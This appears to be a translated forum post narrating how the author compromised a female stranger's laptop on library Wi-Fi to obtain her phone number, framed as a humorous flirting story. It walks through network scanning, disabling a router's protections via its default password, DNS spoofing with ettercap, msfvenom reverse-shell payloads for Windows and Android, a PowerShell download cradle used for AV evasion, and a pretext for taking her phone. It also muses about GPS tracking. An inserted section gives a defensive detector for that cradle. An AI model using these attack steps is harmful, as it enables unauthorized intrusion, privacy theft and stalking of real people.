
"Library Flirting Chronicles" by our group's guru

Yeshisan, 3 months ago

On the technical side of picking up girls: here is "Library Flirting Chronicles" by Yeshisan, guru of our group (7717114)

What does a nerdy shut-in do when he sees a pretty girl and doesn't dare walk up and ask for her contact details? The power of technology.
Although one of the two of us is extremely handsome and a genuine Casanova, I still think the show-off route is the way to go.

Background

A great man once said: nobody does anything for no reason.
Briefly, the background: I ran into a girl in the library, and she was very pretty.

As a hardcore shut-in, walking up and flirting was out of the question, so I wondered whether I could get her contact details some other way.

Think about it the normal way: what does a person keep on their computer? If there's something like a registration form on it, wouldn't it have a phone number, an email address and other contact details???

Our entry point, then, is the computer.

From years of sleazy experience I could tell the girl was a student and that her computer would have such things on it. (Don't ask me how I know.)

Approach

A personal computer doesn't have a fixed IP address the way a server does, so the usual pentesting playbook goes out the window. Never mind the lack of a fixed IP; even if she had one, picking out a single address among all the IPs in the world is practically impossible. But the library has free Wi-Fi. As soon as we connect to that Wi-Fi we're on the same subnet as the girl, so we can enumerate the live hosts on the LAN, find the internal address DHCP handed to her, and then scan her ports and have some fun.

First, let's look at the IP address the router's DHCP has assigned to us

root@promote:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.123 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::20c:29ff:fe18:1e36 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:18:1e:36 txqueuelen 1000 (Ethernet)
RX packets 34 bytes 2820 (2.7 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 48 bytes 3407 (3.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1 (Local Loopback)
RX packets 20 bytes 1116 (1.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 20 bytes 1116 (1.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

Our current IP address is 192.168.1.123, so the gateway is 192.168.1.1.
The LAN's host range is 0 to 255, so we just need to scan 0-255 and see which IPs are alive

root@promote:~# nmap -sP 192.168.1.0/24

Starting Nmap 7.40 ( https://nmap.org ) at 2017-06-25 22:35 CST
Nmap scan report for bogon (192.168.1.1)
Host is up (0.0012s latency).
MAC Address: 44:97:5A:A2:CE:FE (Shenzhen Fast Technologies)
Nmap scan report for bogon (192.168.1.106)
Host is up (0.00019s latency).
MAC Address: A8:1E:84:28:81:6F (Quanta Computer)
Nmap scan report for bogon (192.168.1.103)
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.34 seconds

Probing with nmap shows two live IPs, 106 and 103. Note that this is an environment I rebuilt to reproduce the scenario; in reality there would be far more IPs. So how do we tell which IP was assigned to the girl?
We could capture packets and work it out, but I chose the crudest and simplest method: peeking at her screen.

Since there were only a few people in the library, and the only laptops were ours two plus the front desk's computer, I figured screen-peeking was the most effective method.

win10 (front desk), win7 (the girl), kali linux (me)

So we just need to probe which IP is running Windows 7 to pin down the target.

root@promote:~# nmap -O 192.168.1.106

Starting Nmap 7.40 ( https://nmap.org ) at 2017-06-25 22:37 CST
Nmap scan report for bogon (192.168.1.106)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
902/tcp open iss-realsecure
912/tcp open apex-mesh
MAC Address: A8:1E:84:28:81:6F (Quanta Computer)
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 10|Vista|7|8.1|2008|Longhorn|2016 (96%)
OS CPE: cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_vista cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_server_2008 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows 10 (96%), Microsoft Windows Vista, Windows 7 SP1, or Windows 8.1 Update 1 (93%), Microsoft Windows 10 1511 (92%), Microsoft Windows 10 build 10074 - 10586 (92%), Version 6.1 (Build 7601: Service Pack 1) (92%), Microsoft Windows 10 build 10586 (89%), Microsoft Windows Vista SP2 or Windows 7 Ultimate SP0 - SP1 (89%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (88%), Microsoft Windows 7 or Windows Server 2008 R2 (88%), Microsoft Windows Vista SP1 - SP2, Windows Server 2008 SP2, or Windows 7 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.20 seconds

The final result says 106 is Win7. With the -O option, nmap also probes the target's open ports and services, so we can go after vulnerabilities in some of those services, port 445 for example.

I tried exploiting these services with Metasploit, but with no result.

I went to the bathroom for a smoke and had a bold idea. Since a frontal attack didn't work, I could go around: generate a trojan with msf, then use DNS hijacking to redirect every site the girl visits to my IP, and lure her into downloading the trojan we generated.

But many routers now have defenses, such as protection against ARP hijacking, so I first had to take down the router's mechanisms. I opened the router's web UI, typed the default password, and I was in......... Suddenly I felt my luck was pretty good. Ignoring the details, I simply turned off all of the router's protection mechanisms.

Then, first generate an exe trojan.

root@book:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=4444 -f exe > 1.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes

Start Metasploit and set up a listener.
msf > use exploit/multi/handler //load the module
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp //load the payload; it must match the payload used to generate the trojan
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > show options //view the options that need setting

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Wildcard Target

msf exploit(handler) > set LHOST 192.168.1.123 //set the listen IP address
LHOST => 192.168.1.123
msf exploit(handler) > set LPORT 4444 //set the listen port
LPORT => 4444
msf exploit(handler) > run //start listening

Started reverse TCP handler on 192.168.1.123:4444
Starting the payload handler...
Sending stage (1189423 bytes) to 192.168.1.106
Meterpreter session 1 opened (192.168.1.123:4444 -> 192.168.1.106:21435) at 2017-06-25 22:52:03 +0800
Sending stage (1189423 bytes) to 192.168.1.106
[-] OpenSSL::SSL::SSLError SSL_accept returned=1 errno=0 state=unknown state: tlsv1 alert protocol version

With the trojan generated, edit ettercap's DNS configuration file.

vim /etc/ettercap/etter.dns

The wildcard stands for all domains.
What follows A and PTR is the address they point to. Since a wildcard is used, once hijacking is switched on, whatever site the target visits will end up pointing at our Kali machine.
After editing, start the Apache service.

service apache2 start

Then start ettercap. If you don't know how to do DNS spoofing with ettercap, see this article.
https://blog.csdn.net/hy_696/article/details/74640519
Next, copy the trojan to the web root.

root@book:~$ cp test.exe /var/www/html

Note: you can write an HTML page as a disguise, for example one that says "your browser version is too old, please install the latest version and visit again", and then shows a download link.

After a long wait, msf still had no session from the target.

I peeked at her screen again and saw a familiar icon in the bottom-right corner of the girl's desktop.

Slightly awkward, because the generated trojan isn't AV-evasive, so there was a 99.99% chance 360 had blocked it. So the trojan needs some AV evasion. Here I planned to have msf generate a PowerShell one-liner, save it as a .bat file and lure the target into downloading it again. In testing, a 360 scan flags it as a virus, but when it's actually executed 360 goes blind and gives no prompt at all.

msf > use exploit/multi/script/web_delivery //load the module
msf exploit(web_delivery) > info //view the options that need setting

Name: Script Web Delivery
Module: exploit/multi/script/web_delivery
Platform: Python, PHP, Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Manual
Disclosed: 2013-07-19

Provided by:
Andrew Smith "jakx" <jakx.ppr@gmail.com>
Ben Campbell <eat_meatballs@hotmail.co.uk>
Chris Campbell

Available targets:
Id Name
-- ----
0 Python
1 PHP
2 PSH

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)

Payload information:

Description:
This module quickly fires up a web server that serves a payload. The
provided command will start the specified scripting language
interpreter and then download and execute the payload. The main
purpose of this module is to quickly establish a session on a target
machine when the attacker has to manually type in the command
himself, e.g. Command Injection, RDP Session, Local Access or maybe
Remote Command Exec. This attack vector does not write to disk so it
is less likely to trigger AV solutions and will allow privilege
escalations supplied by Meterpreter. When using either of the PSH
targets, ensure the payload architecture matches the target computer
or use SYSWOW64 powershell.exe to execute x86 payloads on x64
machines.

References:
http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html
http://www.pentestgeek.com/2013/07/19/invoke-shellcode/
http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/
http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html

msf exploit(web_delivery) > set URIPATH / //set to the root path
URIPATH => /
msf exploit(web_delivery) > set target 2 //set the type of file to generate, here PSH
target => 2
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp //payload
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > show options //view the configured options

Module options (exploit/multi/script/web_delivery):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH / no The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
2 PSH

msf exploit(web_delivery) > set LHOST 192.168.1.123 //set the connect-back IP
LHOST => 192.168.1.123
msf exploit(web_delivery) > set LPORT 4444 //set the connect-back port
LPORT => 4444
msf exploit(web_delivery) > run //with the options set, just run; msf automatically generates a PowerShell snippet
Exploit running as background job.
Started reverse TCP handler on 192.168.1.123:4444
Using URL: http://0.0.0.0:8080/
Local IP: http://192.168.1.123:8080/
Server started.
Run the following command on the target machine:
powershell.exe -nop -w hidden -c $B=new-object net.webclient;$B.proxy=[Net.WebRequest]::GetSystemWebProxy();$B.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $B.downloadstring('http://192.168.1.123:8080/');
(the line above is the generated PowerShell code)

Copy this last PowerShell snippet, save it as a .bat file and move it to the web directory.

powershell.exe -nop -w hidden -c $B=new-object net.webclient;$B.proxy=[Net.WebRequest]::GetSystemWebProxy();$B.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $B.downloadstring('http://192.168.1.123:8080/');
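From the defender's side, the one-liner above is the classic PowerShell download cradle: no profile, hidden window, a WebClient, DownloadString and IEX. Because it never writes the payload to disk, the exe scanner that caught the first trojan sees nothing; what does see it is process-creation logging (Sysmon Event ID 1, Windows 4688 with command-line auditing) fed into a rule like the one below. This is an added example and is not part of the original post or of Metasploit; the sample command lines are constructed, and the indicator names and the threshold of 3 are my own choices.

```python
import re

# Constructed sample process-creation command lines (not from the post's own logs).
# [0] is the web_delivery cradle exactly as the post shows it.
SAMPLE_CMDLINES = [
    "powershell.exe -nop -w hidden -c $B=new-object net.webclient;"
    "$B.proxy=[Net.WebRequest]::GetSystemWebProxy();"
    "$B.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
    "IEX $B.downloadstring('http://192.168.1.123:8080/');",
    # Benign admin script: PowerShell, but no cradle traits.
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    # Constructed variant with different casing and spelled-out cmdlet.
    "PowerShell -NoP -W Hidden -C \"iex (New-Object Net.WebClient)"
    ".DownloadString('http://10.0.0.5/a')\"",
    "notepad.exe C:\\Users\\alice\\notes.txt",
]

# Each indicator is one trait of a download cradle; a single hit is weak
# evidence (admins hide windows too), several together are not.
INDICATORS = {
    "hidden_window": re.compile(r"(?i)\s-w(?:indowstyle)?\s+hidden\b"),
    "no_profile": re.compile(r"(?i)\s-no?p(?:rofile)?\b"),
    "download_string": re.compile(r"(?i)\.downloadstring\s*\("),
    "invoke_expression": re.compile(r"(?i)\b(?:iex|invoke-expression)\b"),
    "webclient": re.compile(r"(?i)net\.webclient"),
    "http_url": re.compile(r"(?i)https?://[^\s'\"]+"),
}


def is_powershell(cmdline):
    """True when the image at the start of the command line is powershell(.exe)."""
    return re.match(r"(?i)^\s*\"?(?:.*\\)?powershell(?:\.exe)?\b", cmdline) is not None


def score_cmdline(cmdline):
    """Return (score, list of matched indicator names)."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    return len(hits), hits


def detect_download_cradle(cmdline, threshold=3):
    """Return an alert dict when a PowerShell command line shows at least
    `threshold` cradle traits, else None. The stager URL is extracted so the
    responder can block it and hunt for other hosts that fetched it."""
    if not is_powershell(cmdline):
        return None
    score, hits = score_cmdline(cmdline)
    if score < threshold:
        return None
    url = INDICATORS["http_url"].search(cmdline)
    return {"score": score, "indicators": hits, "url": url.group(0) if url else None}


def scan(cmdlines, threshold=3):
    """Run the detector over a batch of command lines; returns (cmdline, alert) pairs."""
    return [(c, detect_download_cradle(c, threshold))
            for c in cmdlines if detect_download_cradle(c, threshold)]


if __name__ == "__main__":
    for cmd, alert in scan(SAMPLE_CMDLINES):
        print(f"score={alert['score']} url={alert['url']} indicators={alert['indicators']}")
        print(f"  {cmd[:80]}...")
```

The threshold is what keeps this usable: `-w hidden` alone fires on scheduled tasks all day, but hidden window plus no profile plus DownloadString plus IEX on one command line is close to a signature, and the extracted URL (here the post's own 192.168.1.123:8080 stager) is the pivot for the rest of the investigation. Hiding the cradle in a .bat file, as the post does, changes nothing here, since cmd.exe still spawns powershell.exe with the full command line.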

When the target runs it, we successfully get a meterpreter session

msf exploit(web_delivery) > 192.168.1.106 web_delivery - Delivering Payload
Sending stage (957487 bytes) to 192.168.1.106
Meterpreter session 1 opened (192.168.1.123:4444 -> 192.168.1.106:21669) at 2017-06-25 22:59:02 +0800
sessions 1
Starting interaction with 1...

meterpreter >

With this session we can do a lot of things, such as searching the system for image and document files; those files may contain the contact details we're after. As for the pictures... let's not go there...

Through a certain Word document I got the girl's phone number and email, searched for her on WeChat to add her as a friend, compared the avatar, and emmm, confirmed by eye: it's her.

But did you think that was the end?

Although we got the contact details from files on the system, if we could compromise the phone too there'd be far more in it, and we could get her location from the phone's GPS.... uh... I won't go on; use your imagination.

Over the LAN we were lucky enough to get what we wanted, but as soon as the girl leaves the library our trojan is useless, because when generating it I set it to connect back to an internal IP address. So we need a server with a public IP to control the girl's phone or computer long-term. I won't repeat the exe generation; follow the steps above and swap the IP for the public one. Now for the phone trojan. Since the girl uses an Android phone, we'll make an Android trojan.

root@book:~$ msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT = 4444 R > test.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload

Error: The following options failed to validate: LPORT.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------

Payload options (android/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Wildcard Target

msf exploit(handler) > set LHOST 192.168.1.123
LHOST => 192.168.1.123
msf exploit(handler) > run

[-] Handler failed to bind to 192.168.1.123:4444:- -
Started reverse TCP handler on 0.0.0.0:4444
Starting the payload handler...

Same old routine: move the trojan to the web root.

Next, my plan was to borrow the girl's phone, visit Kali's IP address, download the trojan and install it. Which raises the question: how do I borrow her phone? I picked up my phone and pretended to make a call: some random person had been in a car accident and was about to die, tears streaming, and then suddenly my phone "ran out of battery", so I asked the girl to borrow hers.

emmm, the girl was quite sympathetic...

The guy next to me, dumbfounded: that actually works?!....

Out of boredom and for fun, with no improper intentions whatsoever, I told the girl the whole story, and we exchanged WeChat contacts. To this day she still hits me every time she sees me.
